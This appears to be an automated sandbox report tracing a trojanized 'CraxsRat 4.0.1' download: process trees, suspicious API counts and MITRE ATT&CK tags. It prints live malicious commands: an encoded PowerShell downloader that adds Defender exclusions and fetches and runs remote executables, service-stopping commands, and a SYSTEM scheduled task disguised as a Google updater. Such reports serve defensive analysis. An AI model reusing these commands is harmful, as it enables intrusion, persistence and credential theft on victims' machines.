Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exeWinRAR.exe

pid	process
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
1952	WinRAR.exe
1952	WinRAR.exe
1952	WinRAR.exe
1952	WinRAR.exe
1952	WinRAR.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

winrar-x64-622.exeuninstall.exeCraxsRat 4.0.1.exe

pid process

5052 winrar-x64-622.exe
5052 winrar-x64-622.exe
5052 winrar-x64-622.exe
3772 uninstall.exe
4556 CraxsRat 4.0.1.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 3592 wrote to memory of 2712	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2712	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 2628	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 1436	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 1436	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 4576	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 4576	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 4576	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 4576	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 4576	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 4576	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 4576	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 4576	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 4576	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 4576	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 4576	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 4576	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 4576	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 4576	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 4576	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 4576	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 4576	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 4576	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 4576	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 4576	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 4576	3592	chrome.exe	chrome.exe
PID 3592 wrote to memory of 4576	3592	chrome.exe	chrome.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:656

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:580
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:932

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Loads dropped DLL
PID:2508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" https://cdn.discordapp.com/attachments/1096943623599312947/1120870643668373535/CraxsRat_4.0.1.zip
  2⤵
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:3592
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd62bd9758,0x7ffd62bd9768,0x7ffd62bd9778
    3⤵
    PID:2712
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1816 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:2
    3⤵
    PID:2628
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8
    3⤵
    PID:1436
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2220 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8
    3⤵
    PID:4576
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3192 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:1
    3⤵
    PID:3784
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3172 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:1
    3⤵
    PID:1744
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5096 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8
    3⤵
    PID:1688
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5180 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8
    3⤵
    PID:4568
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5348 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8
    3⤵
    PID:2588
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5132 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:1
    3⤵
    PID:388
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5296 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8
    3⤵
    PID:3016
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5524 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:1
    3⤵
    PID:4276
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5680 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8
    3⤵
    PID:4776
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5820 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8
    3⤵
    PID:4832
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5964 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8
    3⤵
    PID:952
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=6112 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:1
    3⤵
    PID:4864
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5692 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:1
    3⤵
    PID:4408
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6028 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8
    3⤵
    PID:3388
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=6368 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:1
    3⤵
    PID:2088
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5408 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8
    3⤵
    PID:1456
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5304 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8
    3⤵
    PID:1468
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8
    3⤵
    PID:1440
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3348 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8
    3⤵
    PID:4864
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5784 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8
    3⤵
    PID:1276
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3272 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8
    3⤵
    PID:2060
- - C:\Users\Admin\Downloads\winrar-x64-622.exe
    "C:\Users\Admin\Downloads\winrar-x64-622.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious use of SetWindowsHookEx
    PID:5052
  - - C:\Program Files\WinRAR\uninstall.exe
      "C:\Program Files\WinRAR\uninstall.exe" /setup
      4⤵
      Executes dropped EXE
      Modifies system executable filetype association
      Registers COM server for autorun
      Drops file in Program Files directory
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:3772
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5148 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4444
- C:\Program Files\WinRAR\WinRAR.exe
  "C:\Program Files\WinRAR\WinRAR.exe" x -iext -ver -imon1 -- "C:\Users\Admin\Downloads\CraxsRat_4.0.1.zip" "?\"
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  PID:1952
- C:\Users\Admin\Downloads\CraxsRat_4.0.1\CraxsRat 4.0.1\CraxsRat 4.0.1.exe
  "C:\Users\Admin\Downloads\CraxsRat_4.0.1\CraxsRat 4.0.1\CraxsRat 4.0.1.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:2704
- - C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
    "C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    PID:2372
  - - C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
      "C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"
      4⤵
      Executes dropped EXE
      PID:4848
  - - C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
      "C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"
      4⤵
      Executes dropped EXE
      PID:3180
  - - C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
      "C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"
      4⤵
      Executes dropped EXE
      PID:2824
  - - C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
      "C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      PID:4556
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
        5⤵
        Accesses Microsoft Outlook accounts
        
        PID:3688
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
        5⤵
        
        PID:4084
- - C:\Users\Admin\AppData\Local\Temp\BLACKK.exe
    "C:\Users\Admin\AppData\Local\Temp\BLACKK.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:952
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAZQBnACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaQByAGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegB6AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZAB6AHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAG4AaQBwAGsAdgAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAeAByAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAGUAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAdgBsAHcAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeAB5AHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHEAcgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB3AGYAZwAjAD4A"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      PID:4960
    - - C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg0.exe"
        5⤵
        Executes dropped EXE
        
        PID:1264
    - - C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg1.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2900
    - - C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg2.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:5084
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:748
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:1392
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1280
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4868
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3196
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:3280
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:4892
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:4424
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:4812
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:312
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:3408
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:3612
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:392
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hgkvzf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineCPS' /tr '''C:\Program Files\Google\Chrome\updaters.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaters.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineCPS' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:1764

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2592

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:848

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4832

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3804

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scripting

T1064

Persistence

Change Default File Association

T1042

Modify Existing Service

T1031

